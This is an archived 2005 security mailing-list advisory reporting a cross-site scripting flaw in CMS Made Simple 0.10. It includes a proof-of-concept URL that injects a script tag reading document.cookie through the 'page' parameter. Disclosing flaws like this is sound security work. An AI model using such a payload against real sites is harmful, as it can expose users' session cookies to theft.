|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
CMS Made Simple 0.10 is susceptible to a cross site scripting attack.
X1ngBox
securityfocus.com
Date: Mon Sep 26 2005 - 03:38:05 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Description]: CMS lets you update your pages and keep the content on a static page that will
not become stale regardless of how much other content gets placed on your site
[version]:CMS Made Simple 0.10
[vendor]:http://www.cmsmadesimple.org
[Vulnerability]: cross site script
[exploit]:
http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
.......[X1NG]..........
X1ngBox <at/> Gmail Com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]